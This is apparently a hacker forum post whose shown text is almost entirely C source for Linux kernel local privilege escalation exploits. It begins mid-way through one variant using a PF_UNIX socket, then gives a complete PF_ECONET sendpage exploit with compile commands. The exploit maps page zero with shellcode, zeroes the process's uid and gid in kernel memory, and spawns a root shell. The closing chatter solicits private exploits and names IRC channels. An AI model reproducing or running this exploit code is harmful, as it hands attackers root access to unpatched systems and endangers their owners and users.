    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_UNIX, SOCK_DGRAM, 0)) == -1) {
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

NOTE: that can be added to BSD easily...

Finally, the Econet,wich is a fail usually but has worked on a few *select* 2011 (very nice) kernels..and prooven.

/* PF_ECONET sendpage-raw local root exploit 2011
 * For i386 & ppc compile with the command;
 * gcc -w -o exploit exploit.c
 *
 * For x86_64 kernel and ppc64 Compile as;
 * gcc -w -m64 -o exploit exploit.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

#if !defined(__always_inline)
#define __always_inline inline __attribute__((always_inline))
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movq %%rsp,%0; " : "=r" (sp));
    return sp;
}
#else
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("movl %%esp,%0" : "=r" (sp));
    return sp;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
static __always_inline unsigned long current_stack_pointer(void) {
    unsigned long sp;
    asm volatile ("mr %0,%%r1; " : "=r" (sp));
    return sp;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct;
    asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct));
    return task_struct;
}
#else
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
    thread_info = current_stack_pointer() & ~(4096 - 1);
    if (*(unsigned long *)thread_info >= 0xc0000000) {
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    }
    task_struct = current_stack_pointer() & ~(8192 - 1);
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#define TASK_RUNNING 0
static __always_inline unsigned long current_task_struct(void) {
    unsigned long task_struct, thread_info;
#if defined(__LP64__)
    task_struct = current_stack_pointer() & ~(16384 - 1);
#else
    task_struct = current_stack_pointer() & ~(8192 - 1);
#endif
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    thread_info = task_struct;
    task_struct = *(unsigned long *)thread_info;
    if (*(unsigned long *)task_struct == TASK_RUNNING)
    return task_struct;
    return -1;
}
#endif
#if defined(__i386__) || defined(__x86_64__)
static unsigned long uid, gid;
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (task_struct[0] == uid && task_struct[1] == uid && task_struct[2] == uid && task_struct[3] == uid &&
    task_struct[4] == gid && task_struct[5] == gid && task_struct[6] == gid && task_struct[7] == gid) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#elif defined(__powerpc__) || defined(__powerpc64__)
static int change_cred(void) {
    unsigned int *task_struct;
    task_struct = (unsigned int *)current_task_struct();
    while (task_struct) {
    if (!task_struct[0]) {
    task_struct++;
    continue;
    }
    if (task_struct[0] == task_struct[1] && task_struct[0] == task_struct[2] && task_struct[0] == task_struct[3] &&
    task_struct[4] == task_struct[5] && task_struct[4] == task_struct[6] && task_struct[4] == task_struct[7]) {
    task_struct[0] = task_struct[1] = task_struct[2] = task_struct[3] = task_struct[4] = task_struct[5] =
    task_struct[6] = task_struct[7] = 0;
    break;
    }
    task_struct++;
    }
    return -1;
}
#endif
#define PAGE_SIZE getpagesize() // want 2011, then use this or 4096!

int main(void) {
    char *addr;
    int out_fd, in_fd;
    char template[] = "/tmp/tmp.XX";
#if defined(__i386__) || defined(__x86_64__)
    uid = getuid(), gid = getgid();
#endif
if((addr=mmap(0x0,PAGE_SIZE,PROT_EXEC|PROT_READ|PROT_WRITE,MAP_FIXED|MAP_PRIVATE|MAP_ANONYMOUS,0,0))==MAP_FAILED) {
    perror("- mmap failed");
    exit(EXIT_FAILURE);
    }
#if defined(__i386__) || defined(__x86_64__)
#if defined(__LP64__)
    addr[0] = '\xff';
    addr[1] = '\x24';
    addr[2] = '\x25';
    *(unsigned long *)&addr[3] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#else
    addr[0] = '\xff';
    addr[1] = '\x25';
    *(unsigned long *)&addr[2] = 8;
    *(unsigned long *)&addr[8] = (unsigned long)change_cred;
#endif
#elif defined(__powerpc__) || defined(__powerpc64__)
#if defined(__LP64__)
    *(unsigned long *)&addr[0] = *(unsigned long *)change_cred;
#else
    addr[0] = '\x3f';
    addr[1] = '\xe0';
    *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16;
    addr[4] = '\x63';
    addr[5] = '\xff';
    *(unsigned short *)&addr[6] = (unsigned short)change_cred;
    addr[8] = '\x7f';
    addr[9] = '\xe9';
    addr[10] = '\x03';
    addr[11] = '\xa6';
    addr[12] = '\x4e';
    addr[13] = '\x80';
    addr[14] = '\x04';
    addr[15] = '\x20';
#endif
#endif
    if ((out_fd = socket(PF_ECONET,SOCK_RAW,0)) == -1) { //my baby
    perror("- socket");
    exit(EXIT_FAILURE);
    }
    if ((in_fd = mkstemp(template)) == -1) {
    perror("- mkstemp");
    exit(EXIT_FAILURE);
    }
    if(unlink(template) == -1) {
    perror("- unlink");
    exit(EXIT_FAILURE);
    }
    if (ftruncate(in_fd, PAGE_SIZE) == -1) {
    perror("- ftruncate");
    exit(EXIT_FAILURE);
    }
    sendfile(out_fd, in_fd, NULL, PAGE_SIZE);
    execl("/bin/sh", "sh", "-i", NULL);
    exit(EXIT_SUCCESS);
}

Again, enjoy the *right* made stuff , not taking credit for but, definately fixing some things and adjusting some releases wich seem to now be many forkbombs... i dislike that, either rls your pvts, wich may be ok for even ONE kern, as i am, forsure after a OpenVZ kernel-local, and some kind of OpenVZ attacker in general..interested, email me here/pm whatever.
I can b found on efnet as xd-- / #haxnet or Undernet nickname xds #zombie channel
I look forward to any new things, atm, i can safely say upto 2010, i have covered in ONE neat setup of only 4 exploits..wich is ok.
So, am trying to make a perfect BSD-Linux-x86_64-OpenVZ payload style scanner, any influence is welcome..

Note: i notice this site has HUGE ranks, so if your stuff got here, your damn lucky buddy!
xd

comments: 5 » tags: